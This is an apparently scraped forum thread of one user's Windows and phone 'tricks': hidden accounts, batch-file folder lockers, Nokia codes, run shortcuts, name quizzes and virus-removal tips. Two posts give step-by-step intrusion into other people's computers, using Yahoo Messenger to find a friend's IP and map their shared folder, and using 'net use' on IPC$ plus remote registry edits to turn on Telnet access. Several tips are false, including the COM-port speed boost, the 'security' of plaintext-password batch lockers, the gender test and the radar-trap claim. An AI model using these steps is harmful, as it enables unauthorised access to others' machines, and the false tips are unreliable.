Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

If you are using multiple accounts on a same computer and using the new way to Logon, then sometimes you may have felt to hide some of the accounts, as they might be important for you but you use them very often, and don’t want computer to show them all. We do sometimes create some accounts for testing purpose as well. Lets see how to just hide them rather then deleting it and recreating it again.

1. Go to Start –> Run and type regedit.
2. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi

ndows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
3. There Right click on Userlist, and create a New DWORD value.
4. Name the value as the Account name, and give its value as 0. This will make sure that your account is now hidden.
5. If you want to unhide it back, then just change the value from 0 to 1, this will unhide the account.

How to lock Folder? other way  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Lock The Folder Without Using Any Software....
lock folder with password(without any software)
Copy the following prgram:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set/p "cho=>"
if %cho%==XXXX goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==XXXX goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

* Now paste it in notepad.

* change/edit XXXX with ur password(9th and 22th steps)

* Save it as batch file(with extension .bat).Any name will do.

* Now you see a batch file. Double click it to create a folder locker.

* A new folder named Locker would be formed at the same location.

* Now brings all the files you want to hide in the locker folder.

* Now double click the batch file to lock the folder namely Locker.

* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

how to lock folder in your pc  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Try This!!!!!!!!!
Suppose you want to lock the folder games in d: which has the path D:\Games.In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

Create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder.
try it out!!!!!!!

Nokia Secret Codes2  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Nokia Secret Codes

Here's a list of known codes on Nokia mobile phones. This list does not include codes that make request to the network. To use these codes, just dial them like normal numbers.

Code

Description

*#06#

Display the IMEI (GSM standard)

*#0000#

Display the firmware version and date (with variant info on S40 second edition or newer)

*#bta0#

Display the Bluetooth MAC address (models with build-in Bluetooth radio, activate first to show address)

*#mac0wlan#

Display the WLAN MAC address (models with build-in Wi-fi radio)

*#opr0logo#

Clear the operator logo (3310 and 3330 only)

*#pca0#

Activate the GPRS PCCCH support (early GPRS models)

*#pcd0#

Deactivate the GPRS PCCCH support (early GPRS models)

*#res0wallet#

Reset the mobile wallet (models with mobile wallet)

*#res0#

Soft-format the memory (Symbian models only)

*#rst0#

Reset to factory defaults, confirmation required (DCT4 or newer)

*#sim0clock#

Display the SIM clock status (DCT3 only)

*#ssn0#

Display the manufacturing serial number (mid-range and premium, non-Symbian models, and those devired from them)

*#war0anty#

Display the manufacturing and repair info (no exit on DCT3) or total talk time on Symbian models

*efr0#

Enable EFR encoding (pre-2003 models)

#efr0#

Disable EFR encoding (pre-2003 models)

*hra0#

Enable HR encoding (pre-2003 models)

#hra0#

Disable HR encoding (pre-2003 models)

#pw+1234567890+n#

Display the SIM lock status: (pre-2003 models)
n = 1: provider lock
n = 2: network lock
n = 3: country lock
n = 4: SIM lock

Nokia Secret Codes  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

On the main screen type in:
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \
*#7328748263373738# resets security code.
Default security code is 12345
Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.

tip how to lock folder  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==abcd goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

* Change abcd with ur password

* Save it as batch file(with extension .bat).Any name will do.

* Now you see a batch file. Double click it to create a folder locker.

* A new folder named Locker would be formed at the same location.

* Now brings all the files you want to hide in the locker folder.

* Now double click the batch file to lock the folder namely Locker.

* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

* U r done now enjoy

All run shortcuts.....!!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

All run shortcuts.....!!!
To Access?. - Run CommandAccessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl

Bluetooth Transfer Wizard - fsquirtCalculator - calc

Certificate Manager - certmgr.msc
Character Map - charmapCheck
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Controllers - joy

Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Disk Utility - chkdsk
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier

Event Viewer - eventvwr.mscFile
Express Wizard - iexpress

Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecellGame

Group Policy Editor (XP Prof) - gpedit.msc

Hearts Card Game - mshearts

Indexing Service - ciadv.msc
Internet Properties - inetcpl.cpl
IP Configuration (Display Connection Configuration) - ipconfig /all
IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
IP Configuration (Release All Connections) - ipconfig /release
IP Configuration (Renew All Connections) - ipconfig /renew
IP Configuration (Refreshes DHCP & Re - Registers DNS) -ipconfig /registerdns
IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid

Be Invisible!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Want to be invisible? Let's start >>>

For Invisible scraps and posts :

Just scrap/post [i] , it will become invisible .

For creating Invisible topics and polls :

Topics : In Subject write ALT + 0173

Do same for Polls

New Danger Virus FOunddd  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Haxcoligon Viruss Its will delete ur O.S soo if u wan secure den Do dis trickkk
1st step
copy this code
battrib/s -s -h -r Autorun.inf
attrib/s -s -h -r Ravmon.exe

del/s Autorun.inf
del/s Ravmon.exe

and paste in da notepad
save as a .bat file

2nd step
copy da file that u have made and paste in all drives
and run da file one by one in drive
and restart da computer

how to hack my friend pc through yahoo messenger?  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

how to hack my friend pc through yahoo messenger?
1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -> netstat -an press enter

2)it will show alll Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip adress who is sending you the file

3)Now type : net use: h \\ (the person's ip adress)\shareddocs push enter wait for message to show up

4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has security measures in place to prevent hacking.

5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this file

you are now connected to that person's computer

invisible topic??  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

ALT + 0173

type this n post topic

name check  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

NOW TRY YOUR NAME AND SEE WHAT IT IS!!!!!!!!!!!!!
A: hot
B: loves people
C: good kisser
D: makes people laugh
E: has gorgeous eyes
F: people wild and crazy adore you
G: very outgoing
H: easy to fall in love with
I: loves to laugh and smile
J: is really sweet
K: really silly
L: smile to die for
M: makes dating fun
N: can kick the shit out of u
O: has one of the best personalities ever
P: popular with all types of people
Q: a hypocrite
R: good boyfriend or girlfriend
S: cute
T: very good kisser
U: is very sexual
V: not judgmental
W: very broad minded
X: never let people tell you what to do
Y: is loved by everyone
Z: can be funny and dumb at times
REPOST WITH:
"Does your name fit you???

Watch movie in ms dos!!!!!!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Watch movie in ms dos!!!!!!!

click start--->Run--->telnet towel.blinkenlights.nl

Some More !!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Some More !!


ޫ ެ ޭ ޮ ޯ ް ޱ ँ ं ः अ आ इ ई उ ऊ ऋ ऌ ऍ ऎ ए ऐ ऑ ऒ ओ औ क ख ग घ ङ च छ ज झ ञ ट ठ ड ढ ण त थ द ध न ऩ प फ ब भ म य र ऱ ल ळ ऴ व श ष स ह ़ ऽ ा ि ी ु ू ृ ॄ ॅ ॆ े ै ॉ ॊ ो ौ ् ॐ ॑ ॒ ॓ ॔ क़ ख़ ग़ ज़ ड़ ढ़ फ़ य़ ॠ ॡ ॢ ॣ । ॥ ० १ २ ३ ४ ५ ६ ७ ८ ९ ॰ ঁ ং ঃ অ আ ই ঈ উ ঊ ঋ ঌ এ ঐ ও ঔ ক খ গ ঘ ঙ চ ছ জ ঝ ঞ ট ঠ ড ঢ ণ ত থ দ ধ ন প ফ ব ভ ম য র ল শ ষ স হ ় ঽ া ি ী ু ূ ৃ ৄ ে ৈ ো ৌ ্ ৗ ড় ঢ় য় ৠ ৡ ৢ ৣ ০ ১ ২ ৩ ৪ ৫ ৬ ৭ ৮ ৯ ৰ ৱ ৲ ৳ ৴ ৵ ৶ ৷ ৸ ৹ ৺ ਂ ਅ ਆ ਇ ਈ ਉ ਊ ਏ ਐ ਓ ਔ ਕ ਖ ਗ ਘ ਙ ਚ ਛ ਜ ਝ ਞ ਟ ਠ ਡ ਢ ਣ ਤ ਥ ਦ ਧ ਨ ਪ ਫ ਬ ਭ ਮ ਯ ਰ ਲ ਲ਼ ਵ ਸ਼ ਸ ਹ
ਾ ਿ ੀ ੁ ੂ ੇ ੈ ੋ ੌ ੍ ਖ਼ ਗ਼ ਜ਼ ੜ ਫ਼ ੦ ੧ ੨ ੩ ੪ ੫ ੬ ੭ ੮ ੯ ੰ ੱ ੲ ੳ ੴ ઁ ં ઃ અ આ ઇ ઈ ઉ ઊ ઋ ઍ એ ઐ ઑ ઓ ઔ ક ખ ગ ઘ ઙ ચ છ જ ઝ ઞ ટ ઠ ડ ઢ ણ ત થ દ ધ ન પ ફ બ ભ મ ય ર લ ળ વ શ ષ સ હ ઼ઽ ા િ ી ુ ૂ ૃ ૄ ૅ ે ૈ ૉ ો ૌ ્ ૐ ૠ ૦ ૧ ૨ ૩ ૪ ૫ ૬ ૭ ૮ ૯ ଁ ଂ ଃ ଅ ଆ ଇ ଈ ଉ ଊ ଋ ଌ ଏ ଐ ଓ ଔ କ ଖ ଗ ଘ ଙ ଚ ଛ ଜ ଝ ଞ ଟ ଠ ଡ ଢ ଣ ତ ଥ ଦ ଧ ନ ପ ଫ ବ ଭ ମ ଯ ର ଲ ଳ ଶ ଷ ସ ହ ଼ ଽ ା ି ୀ ୁ ୂ ୃ େ ୈ ୋ ୌ ୍ ୖ ୗ ଡ଼ ଢ଼ ୞ ୟ ୠ ୡ ୦ ୧ ୨ ୩ ୪ ୫ ୬ ୭ ୮ ୯ ୰ ஂ ஃ ஄ அ ஆ இ ஈ உ ஊ எ ஏ ஐ ஒ ஓ ஔ க ங ச ஜ ஞ ட ண த ந ன ப ம ய ர ற ல ள ழ வ ஷ ஸ ஹ ா ி ீ ு ூ ெ ே ை ௉ ொ ோ ௌ ்ௗ ௧ ௨ ௩ ௪ ௫ ௬ ௭ ௮ ௯ ௰ ௱ ௲ ఁ ం ః అ ఆ ఇ ఈ ఉ ఊ ఋ ఌ ఎ ఏ ఐ ఒ ఓ ఔ క ఖ గ ఘ ఙ చ ఛ జ ఝ ఞ ట ఠ డ ఢ ణ త థ ద ధ న ప ఫ బ భ మ య ర ఱ ల ళ వ శ ష స హ ా ి ీ ు ూ ృ ౄ ె ే ై ొ ో ౌ ్ ౕ ౖ ౠ ౡ ౦ ౧ ౨ ౩ ౪ ౫ ౬ ౭ ౮ ౯ ಂ ಃ ಅ ಆ ಇ ಈ ಉ ಊ ಋ ಌ ಎ ಏ ಐ ಒ ಓ ಔ ಕ ಖ ಗ ಘ ಙ ಚ ಛ ಜ ಝ ಞ ಟ ಠ ಡ ಢ ಣ ತ ಥ ದ ಧ ನ ಪ ಫ ಬ ಭ ಮ ಯ ರ ಱ ಲ ಳ ವ ಶ ಷ ಸ ಹ ಾ ಿ ೀ ು ೂ ೃ ೄ ೆ ೇ ೈ ೊ ೋ ೌ ್ ೕ ೖ ೞ ೠ ೡ ೦ ೧ ೨ ೩ ೪ ೫ ೬ ೭ ೮ ೯ ം ഃ അ ആ ഇ ഈ ഉ ഊ ഋ ഌ എ ഏ ഐ ഒ ഓ ഔ ക ഖ ഗ ഘ ങ ച ഛ ജ ഝ ഞ ട ഠ ഡ ഢ ണ ത ഥ ദ ധ ന പ ഫ ബ ഭ മ യ ര റ ല ള ഴ വ ശ ഷ സ ഹ ാ ി ീ ു ൂ ൃ െ േ ൈ ൊ ോ

DIFFERENT WAYS : A TO Z  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

USE THESE

A - Λ Δ Д д 凡 ハ ∂ α ⍺ ą ส ๑ λ Ħ Əə ƌƋ ล

B - ฿ ß ら в Ъ ط ظ ℬ Ь

C - С ℂ ∁ © ₡ ¢ ℭ ς خ ζ

D - Ð ð の Δ ∂ ƌ Ƌ Ժ đ δ

E - ∑ Є ξ ﻉ ۼ є 乡 ℮ ℇ ℰ ε Ξ

F - ₣ Ŧ ア ƒ ﮫ ∫ ʄ Ք ℉ ℱ Ⅎ ∬

G - ら ؤ Ǥ ǥ و ℊ פ

H - Ж か ん ђ Н н ℋ ℍ ℏ ℎ ℌ ℍ ♓ ♄ Ћ

I - ュ ٱ ¡ ι ỉ ۩ 讠ﻨ ェ  ι ΐ أ

J - ڸ J ك ل ڷ ﻟ ⌡ ﺛ ℐ ℑ ﺯ ﺬ ﺫ ﻧ כֿ בֿ פֿ פֿ

K - Ҝ ҝ ✄ ₭ к

L - Ł ュ ∟ ﺎ ℓ Ŀ ʆ ℒ l £

M - Ж ʍ ɱ Պ ਅ ൬ ᄊ ℳ ♏ ᄊ м ை ಌ

N - И и й ฑ ₪ ŋ η カ の л א ท ห ₦ ൯ ໙ ℕ  ಌ

O - Ѳ Ø ㋡ ۞ ♀ ♂ ٥ σ Φ Θ の ø ๑ ه ¤ Ө ө ۝ Ƣ ⃝ ⃠ ǿ Ѻ

P - ア Þ ρ م ƿ Ք ‽ ℗ ℘ ℙ ⍴ ㄕ 卩 卫 户

Q - Φ ♀ ٩ ƣ ʠ ℚ

R - Я я г カ л ® ʁ ℛ ℜ ℝ ℞ ℟ 几 ґ

S - ڪ ګ ک ﻜ ڲ ﻯ ﻛ Տ § ร ﯽ 

T - Ґ т † ‡ ł Ŧ ア ŧ Շ Ⴈ 了 亇 十 ┼

U - μ ∪ リ び ن ڼ ֆ い ڸ

V - √ び ۷ ง ℣

W - حق س ش ШЩ ฬ ฝ พ ฟ ₩ ﷲ ਘ ω

X - Ж א × ﭹ Ⴟ ✗ ✖ ㄨ ﬡ × χ

Y - ¥ ﻻ リ リ Ⴘ 쏘 γ צ ų

Z - み 乡 ζ ʓ ʒ ʑ ℤ ℥ ㆚艺

chck hw sexy ur name is...  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

how sexy is ur name?????????
With the given points below u can calculate how sexy is ur name

if ur points are below 45 then not so sexy
45-65 pretty sexy
65-75 real sexy
above 75 damn sexy


A=23
B=15
C=21
D=29
E=10
F=31
G=34
H=19
I=10
J=22
K=24
L=17
M=11
N=18
O=26
P=28
Q=36
R=09
S=11
T=19
U=29
V=25
W=37
X=44
Y=22
Z=19

HAVE FUN!!!
nd do not forget to enter ur score

Are you a boy or a gal......not a game,chk it out!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

trick to check if u r a boy or gal..
check guy or gal
check-- guy or gal
male or female... Quick Eye Exam...

This will blow your mind...!

Just do it - don't cheat!!!!!!!!!!!!

Try this its actually quite good.

But don't cheat!

Count the number of F's in the following text in
15 seconds:

FINISHED FILES ARE THE
RESULT OF YEARS OF SCIENTIFIC
STUDY COMBINED WITH THE
EXPERIENCE OF YEARS



Managed it?

Scroll down only after you have counted them!



OK?



How many?



Three? (You r definitely male!!!)











Wrong, there are six - no joke!














Read again!



FINISHED FILES ARE THE
RESULT OF YEARS OF SCIENTIFIC
STUDY COMBINED WITH THE
EXPERIENCE OF YEARS



The reasoning is further down...

The MALE brain cannot process the word "OF".



Incredible or what?

Anyone who counts all six F's on the first go has
a brain of a Female



You can test this by asking a Guy/Girl near you
to work it out.


It worked for me

ps: leave your comment..

increase your net speed  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

go to desktop->My computer-(right click on)->manage->->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

U WILL NOTICE AN IMMEDIATE RESULT

this will increase the receiving capacity of your input port and thus ur netspeed will be increased

to lock a folder in windows!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

open notpad and copy the following code and save it as lock.Bat
____________________________________________________________________

cls@ECHO OFFtitle Folder Lockerif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST porno goto MDLOCKER:CONFIRMecho Are you sure u want to Lock the folder(Y/N)set/p "cho=>"if %cho%==Y goto LOCKif %cho%==y goto LOCKif %cho%==n goto ENDif %cho%==N goto ENDecho Invalid choice.goto CONFIRM:LOCKren porno "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"echo Folder lockedgoto End:UNLOCKecho Enter password to Unlock folderset/p "BAS=>"if NOT %BAS%==type your password here goto FAILattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" pornoecho Folder Unlocked successfullygoto End:FAILecho Invalid passwordgoto end:MDLOCKERmd pornoecho Locker created successfullygoto End:End

how to remove the ORKUT virus!!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

How to Remove…

The Orkut Virus which also affects the U-Tube and the Mozilla Firefox

Have you experienced the new ORKUT virus which is quite annoying ? It does not allow the words Orkut or Utube to be typed on the address bar of your IE window. The browser simply closes the first time. But from the second time, strange messages come with the violent laugh MUHAHAHAHAHA!

The virus creates an svchost.exe file which is memory resident and does the above task of preventing Orkut users. The svchost.exe is an essential file for the switching on of any WinXP computer and if it is damaged then the computer will not boot.

But this svchost file comes with the user-process rather than the system process. So, when you open the Task Manager, and view the processes, the user name will be your user-name and NOT SYSTEM, NOT NETWORK etc.

If you find such svchost.exe then your computer is infected with Orkut virus.

Prevention

The virus travels through Flash-drives. The Flash or Pen-drive will have a new file, Microsoftpowerpoint.exe which when double-clicked spreads the virus. therefore whenever you find such file, just don’t open but delete it.

Removal

To remove the virus, open the Task Manager, by pressing Ctrl-Alt-Delete and examine the processes. There will be several svchost.exe files. Ignore them and focus on svchost.exe with username as your username. (Sometimes it may be administrator if you have not created a user name at all).

End such svchost process by selecting it and clicking “End Process”. Then type orkut in the explorer’s address bar and nothing will happen.

Then goto system32 folder, identify svchost.exe file with a prefix icon H and delete it.

Then run regedit and search for “heap” repeatedly and delete all “heap” folders and values. The virus stands removed.

remote access!!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Just Control Another Computer Remotely.
Things tO NeedRemote Pc's Account Username And Password
<-- Method -->
1. Go tO COmmand Promt(press Windows+R and type cmd)2. type cd\ (to go to main root Of C:)3. type the command c:\net use \\(Rempote PC's Username i.e Adrian)\ipc$ /u:Administrator c:\net use \\Adrian\ipc$ /u:Administrator(press Enter) (Results of the above Command) The Password Or Username Is Invalid For \\Adrian\ipc$. Enter The PassWord For "Administrator" tp connect to 'Adrian':***** The Command COmpleted Successfuly.4. Press Window+R Write regedit To Enter RegsitryEditor.5. Press Alt+F Then C.6. Write Down The "Object's Name".Adrian(Computer's Username)then Press Enter. (New Computer's Registry Is Successsfully Accessed).7. Just GO TO Adrian\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0 On The Right Hand Double Click On The Key Named As "NTLM"(New BOx Appear) Value Name:NTLM Value Data:(Replace 2 with 0) Base :HexaDecimal Press OK. Get Out Of registry Editor.8. Again Press Windows+R And Write mmc.(Consol1 Will Open)9. Press Alt+F then M(New Windows Will Appear)10.Press Alt+D Then Double Click On "Computer Management"11.Select "another Computer" and write its Account Login(Adrian).12.Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.13.Now Press OK Of "Add/Remove Snap-in".14.On The Left Hand Expand Computer Management>Select Services And Aplications>Services15.On The Right Hand Scroll down And Right CLick At "Telnet"And Select Restart Option.16.Leave It As It is17.Turn To Command Promt Write c:\telnet Adrian(Press Enter) it Will Require Login And PassWord Login:Administrator PassWord:********(Enter) *----------------------------------------------------------- Welcome TO Microsoft Telnet SErver C:dir(Enter)
Thats It! Enjoy With Kenreaves!!!

vat is registry??  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

The Registry Torn Apart --- ____________________________________________________________________________
The registry is a hierarchical database that contains virtually all information about your computer's configuration. Under previous version of Windows, those setting where contained in files like config.sys, autoexec.bat, win.ini, system.ini, control.ini and so on. From this you can understand how important the registry is. The structure of the registry is similar to the ini files structure, but it goes beyond the concept of ini files because it offers a hierarchical structure, similar to the folders and files on hard disk. In fact the procedure to get to the elements of the registry is similar to the way to get to folders and files. In this section I would be examing the Win95\98 registry only although NT is quite similar.
The Registry EditorThe Registry Editor is a utility by the filename regedit.exe that allows you to see, search, modify and save the registry database of Windows. The Registry Editor doesn't validate the values you are writing: it allows any operation. So you have to pay close attention, because no error message will be shown if you make a wrong operation. To launch the Registry Editor simply run RegEdit.exe ( under WinNT run RegEdt32.exe with administer privileges). The registry editor is divided into two sectios in the left one there is a hierarchical structure of the database (the screen looks like Windows Explorer) in the right one there are the values. The registry is organized into keys and subkeys. Each key contains a value entry , each one has a name, a type or a class and the value itself. The name is a string that identifies the value to the key. The length and the format of the value is dependent on the data type.
As you can see with the Registry Editor, the registry is divided into five principal keys: there is no way to add or delete keys at this level. Only two of these keys are effectively saved on hard disk: HKEY_LOCAL_MACHINE and HKEY_USERS. The others are jusr branches of the main keys or are dynamically created by Windows.
HKEY_LOCAL_MACHINE This key contains any hardware, applications and services information. Several hardware information is updated automatically while the computer is booting. The data stored in this key is shared with any user. This handle has many subkeys:
Config Contains configuration data for different hardware configurations. Enum This is the device data. For each device in your computer, you can find information such as the device type, the hardware manufacturer, device drivers and the configuration. Hardware This key contains a list of serial ports, processors and floating point processors.Network Contains network information. Security Shows you network security information. Software This key contains data about installed software.System It contains data that checks which device drivers are used by Windows and how they are configured.
HKEY_CLASSES_ROOT This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes and contains OLE, drag'n'drop, shortcut and file association information.
HKEY_CURRENT_CONFIG This key is also an alias. It contains a copy of the branch HKEY_LOCAL_MACHINE\Config, with the current computer configuration.
HKEY_DYN_DATA Some information stored in the registry changes frequently, so Windows maintains part of the registry in memory instead of on the hard disk. For example it stores PnP information and computer performance. This key has two sub keys
Config Manager This key contains all hardware information problem codes, with their status. There is also the sub key HKEY_LOCAL_MACHINE\Enum, but written in a different way. PerfStats It contains performance data about system and network
HKEY_USERS This important key contains the sub key .Default and another key for each user that has access to the computer. If there is just one user, only .Default key exists. . Each sub key maintains the preferences of each user, like the desktop colors, the fonts used, and also the settings of many programs. If you open a user subkey you will find five important subkeys:
AppEvent It contains the path of audio files that Windows plays when some events happen. Control Panel Here are the settings defined in the Control Panel. They used to be stored in win.ini and control.ini. Keyboard Layouts It contains a voice that identify the actual keyboard disposition how it is set into the Control Panel. Network This key stores subkeys that describe current and recent network shortcuts. RemoteAccess The settings of Remote Access are stored here. Software Contains all software settings. This data was stored in win.ini and private .ini files. HKEY_CURRENT_USER It is an alias to current user of HKEY_USERS. If your computer is not configured for multi-users usage, it points to the subkey .Default of HKEY_USERS.
Description of .reg file
Here I am assuming that you already have a .reg file on your hard disk and want to know more about how it is structured.Now do not double click the .reg file or it's content will be added to the registry, of course there will be warning message that pops up. Now to view the properties of the .reg file open it in notepad.To do so first launch notepad by going to Start>Programs>Accessories>Notepad.Then through the open menu open the .reg file.Now the thing that differentiates .reg files from other files is the word REGEDIT4. It is found to be the first word in all .reg files. If this word is not there then the registry editor cannot recognize the file to be a .reg file. Then follows the key declaration which has to be done within square brackets and with the full path.If the key does not exist then it will be created.After the key declaration you will see a list of values that have to be set in the particular key in the registry.The values look like this: "value name"=type:value Value name is in double commas. Type can be absent for string values, dword: for dword values and hex: for binary values and for all other values you have to use the code hex(#): , where # indicate the API code of the type.

Published on Black Sun Research Facility -Important Note: expand string has API code = 2 and extended string has API code = 7.
As you can see, strings are in double quotes, dword is hexadecimal and binary is a sequence of hexadecimal byte pairs, with a comma between each. If you want to add a back slash into a string remember to repeat it two times, so the value "c:\Windows" will be "c:\\Windows". Before write a new .reg file, make sure you do this else you will get an error message.
Command Line Registry Arguments
FILENAME.REG to merge a .reg file with the registry /L:SYSTEM to specify the position of SYSTEM.DAT /R:USER to specify the position of USER.DAT /e FILENAME.REG [KEY] to export the registry to a file. If the key is specified, the whole branch will be exported./c FILENAME.REG to substitute the entire registry with a .reg file /s to work silently, without prompt information or Warnings.
That wraps up the Windows Registry

learn hacking!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

How to learn to hack in easy steps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction
~~~~~~~~~~~~


If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.

I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.

When you finish reading it, please TELL ME how you like it!

COPYING: You're welcome to distribute this document to whoever the hell you want, post it
